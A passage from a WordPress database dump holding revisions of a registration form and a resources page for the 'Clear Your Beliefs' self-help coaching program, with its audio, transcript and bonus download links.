(1133, 4194, '2014-06-28 13:54:03', '2014-06-28 18:54:03', '<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/6430086e2fd4ab1d24af175de21dedd2" method="POST"><input name="inf_form_xid" type="hidden" value="6430086e2fd4ab1d24af175de21dedd2" />\r\n\r\n<input name="inf_form_name" type="hidden" value="clearyourbeliefs.com/registration" />\r\n\r\n<input name="infusionsoft_version" type="hidden" value="1.31.0.28" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_City">City *</label>\r\n\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_GoodDaysforCoaching0">Good Days for Coaching *</label>\r\n\r\n<select id="inf_custom_GoodDaysforCoaching0" multiple="multiple" name="inf_custom_GoodDaysforCoaching0" size="7"><option value="Monday">Monday</option><option value="Tuesday">Tuesday</option><option value="Wednesday">Wednesday</option><option value="Thursday">Thursday</option><option value="Friday">Friday</option><option value="Saturday">Saturday</option><option value="Sunday">Sunday</option></select>\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_GoodTimesforCoaching">Good Times for Coaching *</label>\r\n\r\n<select id="inf_custom_GoodTimesforCoaching" multiple="multiple" name="inf_custom_GoodTimesforCoaching" size="4"><option value="Morning (8 am to 11 am)">Morning (8 am to 11 am)</option><option value="Mid-day (11 am to 2 pm)">Mid-day (11 am to 2 pm)</option><option value="Afternoon (2 pm to 6 pm)">Afternoon (2 pm to 6 pm)</option><option value="Evening (6 pm to 10 pm)">Evening (6 pm to 10 pm)</option></select>\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_TimeZone">Time Zone *</label>\r\n\r\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Password">Please choose your own passcode. *</label>\r\n\r\n<input id="inf_field_Password" class="infusion-field-input-container" name="inf_field_Password" type="password" />\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Register" />\r\n\r\n</div>\r\n</form>', 'Registration', '', 'inherit', 'closed', 'open', '', '1132-revision-v1', '', '', '2014-06-28 13:54:03', '2014-06-28 18:54:03', '', 1132, 'http://clearyourbeliefs.com/1132-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1134, 4194, '2014-06-28 13:56:45', '2014-06-28 18:56:45', '<div class="icon_box"><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/6430086e2fd4ab1d24af175de21dedd2" method="POST"><input name="inf_form_xid" type="hidden" value="6430086e2fd4ab1d24af175de21dedd2" /><input name="inf_form_name" type="hidden" value="clearyourbeliefs.com/registration" />\r\n\r\n<input name="infusionsoft_version" type="hidden" value="1.31.0.28" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_City">City *</label>\r\n\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_GoodDaysforCoaching0">Good Days for Coaching *</label>\r\n\r\n<select id="inf_custom_GoodDaysforCoaching0" multiple="multiple" name="inf_custom_GoodDaysforCoaching0" size="7"><option value="Monday">Monday</option><option value="Tuesday">Tuesday</option><option value="Wednesday">Wednesday</option><option value="Thursday">Thursday</option><option value="Friday">Friday</option><option value="Saturday">Saturday</option><option value="Sunday">Sunday</option></select>\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_GoodTimesforCoaching">Good Times for Coaching *</label>\r\n\r\n<select id="inf_custom_GoodTimesforCoaching" multiple="multiple" name="inf_custom_GoodTimesforCoaching" size="4"><option value="Morning (8 am to 11 am)">Morning (8 am to 11 am)</option><option value="Mid-day (11 am to 2 pm)">Mid-day (11 am to 2 pm)</option><option value="Afternoon (2 pm to 6 pm)">Afternoon (2 pm to 6 pm)</option><option value="Evening (6 pm to 10 pm)">Evening (6 pm to 10 pm)</option></select>\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_TimeZone">Time Zone *</label>\r\n\r\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Password">Please choose your own passcode. *</label>\r\n\r\n<input id="inf_field_Password" class="infusion-field-input-container" name="inf_field_Password" type="password" />\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Register" />\r\n\r\n</div>\r\n</form></div>', 'Registration', '', 'inherit', 'closed', 'open', '', '1132-revision-v1', '', '', '2014-06-28 13:56:45', '2014-06-28 18:56:45', '', 1132, 'http://clearyourbeliefs.com/1132-revision-v1', 0, 'revision', '', 0),
(1135, 4194, '2014-06-28 14:19:46', '2014-06-28 19:19:46', '<p>Thank you for your order!  Check your email for your confirmation and Access Code.  You should receive it within a few minutes.  If you don’t, please check your spam folder.  The email will be from support@clearyourbeliefs.com</p>\n\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/6430086e2fd4ab1d24af175de21dedd2" method="POST"><input name="inf_form_xid" type="hidden" value="6430086e2fd4ab1d24af175de21dedd2" /><input name="inf_form_name" type="hidden" value="clearyourbeliefs.com/registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.28" />\n<div class="infusion-field">\n\n<label for="inf_field_FirstName">First Name *</label>\n\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\n\n</div>\n<div class="infusion-field">\n\n<label for="inf_field_LastName">Last Name *</label>\n\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\n\n</div>\n<div class="infusion-field">\n\n<label for="inf_field_City">City *</label>\n\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\n\n</div>\n<div class="infusion-field">\n\n<label for="inf_field_Email">Email *</label>\n\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\n\n</div>\n<div class="infusion-field">\n\n<label for="inf_custom_GoodDaysforCoaching0">Good Days for Coaching *</label>\n\n<select id="inf_custom_GoodDaysforCoaching0" multiple="multiple" name="inf_custom_GoodDaysforCoaching0" size="7"><option value="Monday">Monday</option><option value="Tuesday">Tuesday</option><option value="Wednesday">Wednesday</option><option value="Thursday">Thursday</option><option value="Friday">Friday</option><option value="Saturday">Saturday</option><option value="Sunday">Sunday</option></select>\n\n</div>\n<div class="infusion-field">\n\n<label for="inf_custom_GoodTimesforCoaching">Good Times for Coaching *</label>\n\n<select id="inf_custom_GoodTimesforCoaching" multiple="multiple" name="inf_custom_GoodTimesforCoaching" size="4"><option value="Morning (8 am to 11 am)">Morning (8 am to 11 am)</option><option value="Mid-day (11 am to 2 pm)">Mid-day (11 am to 2 pm)</option><option value="Afternoon (2 pm to 6 pm)">Afternoon (2 pm to 6 pm)</option><option value="Evening (6 pm to 10 pm)">Evening (6 pm to 10 pm)</option></select>\n\n</div>\n<div class="infusion-field">\n\n<label for="inf_custom_TimeZone">Time Zone *</label>\n\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\n\n</div>\n<div class="infusion-field">\n\n<label for="inf_field_Password">Please choose your own passcode. *</label>\n\n<input id="inf_field_Password" class="infusion-field-input-container" name="inf_field_Password" type="password" />\n\n</div>\n<div class="infusion-submit">\n\n<input type="submit" value="Register" />\n\n</div>\n</form></div>', 'Registration', '', 'inherit', 'closed', 'open', '', '1132-autosave-v1', '', '', '2014-06-28 14:19:46', '2014-06-28 19:19:46', '', 1132, 'http://clearyourbeliefs.com/1132-autosave-v1', 0, 'revision', '', 0),
(1136, 4194, '2014-06-28 13:58:09', '2014-06-28 18:58:09', '<div class="icon_box" style="width: 50%; margin: 30px auto;"><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/6430086e2fd4ab1d24af175de21dedd2" method="POST"><input name="inf_form_xid" type="hidden" value="6430086e2fd4ab1d24af175de21dedd2" /><input name="inf_form_name" type="hidden" value="clearyourbeliefs.com/registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.28" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_City">City *</label>\r\n\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_GoodDaysforCoaching0">Good Days for Coaching *</label>\r\n\r\n<select id="inf_custom_GoodDaysforCoaching0" multiple="multiple" name="inf_custom_GoodDaysforCoaching0" size="7"><option value="Monday">Monday</option><option value="Tuesday">Tuesday</option><option value="Wednesday">Wednesday</option><option value="Thursday">Thursday</option><option value="Friday">Friday</option><option value="Saturday">Saturday</option><option value="Sunday">Sunday</option></select>\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_GoodTimesforCoaching">Good Times for Coaching *</label>\r\n\r\n<select id="inf_custom_GoodTimesforCoaching" multiple="multiple" name="inf_custom_GoodTimesforCoaching" size="4"><option value="Morning (8 am to 11 am)">Morning (8 am to 11 am)</option><option value="Mid-day (11 am to 2 pm)">Mid-day (11 am to 2 pm)</option><option value="Afternoon (2 pm to 6 pm)">Afternoon (2 pm to 6 pm)</option><option value="Evening (6 pm to 10 pm)">Evening (6 pm to 10 pm)</option></select>\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_TimeZone">Time Zone *</label>\r\n\r\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Password">Please choose your own passcode. *</label>\r\n\r\n<input id="inf_field_Password" class="infusion-field-input-container" name="inf_field_Password" type="password" />\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Register" />\r\n\r\n</div>\r\n</form></div>', 'Registration', '', 'inherit', 'closed', 'open', '', '1132-revision-v1', '', '', '2014-06-28 13:58:09', '2014-06-28 18:58:09', '', 1132, 'http://clearyourbeliefs.com/1132-revision-v1', 0, 'revision', '', 0),
(1137, 4194, '2014-06-28 14:20:51', '2014-06-28 19:20:51', '<h1 style="text-align: center;">Thank you for your order!</h1>\r\n<h6 style="text-align: center;">Check your email for your confirmation and Access Code. You should receive it within a few minutes. If you don’t, please check your spam folder.</h6>\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/6430086e2fd4ab1d24af175de21dedd2" method="POST">\r\n<h6><input name="inf_form_xid" type="hidden" value="6430086e2fd4ab1d24af175de21dedd2" /><input name="inf_form_name" type="hidden" value="clearyourbeliefs.com/registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.28" /></h6>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_City">City *</label>\r\n\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_GoodDaysforCoaching0">Good Days for Coaching *</label>\r\n\r\n<select id="inf_custom_GoodDaysforCoaching0" multiple="multiple" name="inf_custom_GoodDaysforCoaching0" size="7"><option value="Monday">Monday</option><option value="Tuesday">Tuesday</option><option value="Wednesday">Wednesday</option><option value="Thursday">Thursday</option><option value="Friday">Friday</option><option value="Saturday">Saturday</option><option value="Sunday">Sunday</option></select>\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_GoodTimesforCoaching">Good Times for Coaching *</label>\r\n\r\n<select id="inf_custom_GoodTimesforCoaching" multiple="multiple" name="inf_custom_GoodTimesforCoaching" size="4"><option value="Morning (8 am to 11 am)">Morning (8 am to 11 am)</option><option value="Mid-day (11 am to 2 pm)">Mid-day (11 am to 2 pm)</option><option value="Afternoon (2 pm to 6 pm)">Afternoon (2 pm to 6 pm)</option><option value="Evening (6 pm to 10 pm)">Evening (6 pm to 10 pm)</option></select>\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_TimeZone">Time Zone *</label>\r\n\r\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Password">Please choose your own passcode. *</label>\r\n\r\n<input id="inf_field_Password" class="infusion-field-input-container" name="inf_field_Password" type="password" />\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Register" />\r\n\r\n</div>\r\n</form></div>', 'Registration', '', 'inherit', 'closed', 'open', '', '1132-revision-v1', '', '', '2014-06-28 14:20:51', '2014-06-28 19:20:51', '', 1132, 'http://clearyourbeliefs.com/1132-revision-v1', 0, 'revision', '', 0),
(1138, 2, '2014-06-28 16:18:35', '2014-06-28 21:18:35', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "Recommended Course Flow" for suggestions on taking yourself through the program.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\nLion Goodman\r\nFounder\r\n\r\n&nbsp;\r\n<h6>Audio Recordings</h6>\r\n<span style="color: rgb(128, 0, 0);">[<strong>NOTE</strong>: Right-click the link and "Save As" to save it to your computer for later listening, or click the link and listen on the web now.]</span>\r\n\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3"><span style="color: rgb(0, 0, 0);">Session 2:  Clear Your Negative Beliefs About Who You Are</span>\r\nClear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3"><span style="color: rgb(0, 0, 0);">Session 3: Clear Your Limiting Beliefs About Your Capabilities</span>\r\nClear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3"><span style="color: rgb(0, 0, 0);">Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</span>\r\nClear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3"><span style="color: rgb(0, 0, 0);">Session 5: Clear Your Old Beliefs About Money and Work</span>\r\nClear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3"><span style="color: rgb(0, 0, 0);">Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</span>\r\nClear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3"><span style="color: rgb(0, 0, 0);">Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</span>\r\nClear Your Beliefs-07.mp3</a>\r\n\r\nBonus Call 1: Anodea Judith on Manifestating with Beliefs\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-Bonus Call With Anodea Judith.mp3">Clear Your Beliefs-Bonus Call With Anodea Judith.mp3</a>\r\n\r\nBonus Call 2: Carista Luminare on Love and Relationships<a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3">\r\nClear Your Beliefs-Bonus Call With Carista Luminare.mp3</a>\r\n\r\n<strong>Transcripts:</strong>\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\nSession 2:  Clear Your Negative Beliefs About Who You Are\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a>\r\n\r\nSession 3: Clear Your Limiting Beliefs About Your Capabilities\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\nSession 4: Clear Your Outdated Beliefs About Love &amp; Relationship\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\nSession 5: Clear Your Old Beliefs About Money and Work\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\nSession 6: Clear Uncomfortable Beliefs About Your Body &amp; Health\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\nSession 7: Clear Out the Rest of the Junk in Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n\r\nBonus Call with Carista Luminare, Ph.D.:  What Makes Love So Confusing?            Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a>\r\n\r\nBonus Call with Anodea Judith, Ph.D: The Spiritual Technology of Manifesting         Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a>\r\n\r\n&nbsp;\r\n<h6>Bonus Materials:</h6>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)\r\n\r\nOnce you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-28 16:18:35', '2014-06-28 21:18:35', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(1139, 2, '2014-06-28 16:26:12', '2014-06-28 21:26:12', '', 'Belief Self Diagnosis Exercise 2013.2', '', 'inherit', 'closed', 'open', '', 'belief-self-diagnosis-exercise-2013-2', '', '', '2014-06-28 16:26:12', '2014-06-28 21:26:12', '', 139, 'http://clearyourbeliefs.com/wp-content/uploads/2014/03/Belief-Self-Diagnosis-Exercise-2013.2.pdf', 0, 'attachment', 'application/pdf', 0),
(1143, 2, '2014-06-28 17:16:12', '2014-06-28 22:16:12', '', 'CYB Belief Self-Diagnosis Exercise 2014.2', '', 'inherit', 'closed', 'open', '', 'cyb-belief-self-diagnosis-exercise-2014-2', '', '', '2014-06-28 17:16:12', '2014-06-28 22:16:12', '', 139, 'http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.2.pdf', 0, 'attachment', 'application/pdf', 0),
(1140, 2, '2014-06-28 16:26:47', '2014-06-28 21:26:47', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "Recommended Course Flow" for suggestions on taking yourself through the program.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\nLion Goodman\r\nFounder\r\n\r\n&nbsp;\r\n<h6>Audio Recordings</h6>\r\n<span style="color: #800000;">[<strong>NOTE</strong>: Right-click the link and "Save As" to save it to your computer for later listening, or click the link and listen on the web now.]</span>\r\n\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3"><span style="color: #000000;">Session 2:  Clear Your Negative Beliefs About Who You Are</span>\r\nClear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3"><span style="color: #000000;">Session 3: Clear Your Limiting Beliefs About Your Capabilities</span>\r\nClear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3"><span style="color: #000000;">Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</span>\r\nClear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3"><span style="color: #000000;">Session 5: Clear Your Old Beliefs About Money and Work</span>\r\nClear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3"><span style="color: #000000;">Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</span>\r\nClear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3"><span style="color: #000000;">Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</span>\r\nClear Your Beliefs-07.mp3</a>\r\n\r\nBonus Call 1: Anodea Judith on Manifestating with Beliefs\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-Bonus Call With Anodea Judith.mp3">Clear Your Beliefs-Bonus Call With Anodea Judith.mp3</a>\r\n\r\nBonus Call 2: Carista Luminare on Love and Relationships<a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3">\r\nClear Your Beliefs-Bonus Call With Carista Luminare.mp3</a>\r\n\r\n<strong>Transcripts:</strong>\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\nSession 2:  Clear Your Negative Beliefs About Who You Are\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a>\r\n\r\nSession 3: Clear Your Limiting Beliefs About Your Capabilities\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\nSession 4: Clear Your Outdated Beliefs About Love &amp; Relationship\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\nSession 5: Clear Your Old Beliefs About Money and Work\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\nSession 6: Clear Uncomfortable Beliefs About Your Body &amp; Health\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\nSession 7: Clear Out the Rest of the Junk in Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n\r\nBonus Call with Carista Luminare, Ph.D.:  What Makes Love So Confusing?            Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a>\r\n\r\nBonus Call with Anodea Judith, Ph.D: The Spiritual Technology of Manifesting         Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a>\r\n\r\n&nbsp;\r\n<h6>Bonus Materials:</h6>\r\n<strong>The Belief Self-Diagnosis Exercise: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/Belief-Self-Diagnosis-Exercise-2013.2.pdf">Belief Self Diagnosis Exercise 2013.2</a></strong>\r\n\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)\r\n\r\nOnce you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-28 16:26:47', '2014-06-28 21:26:47', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
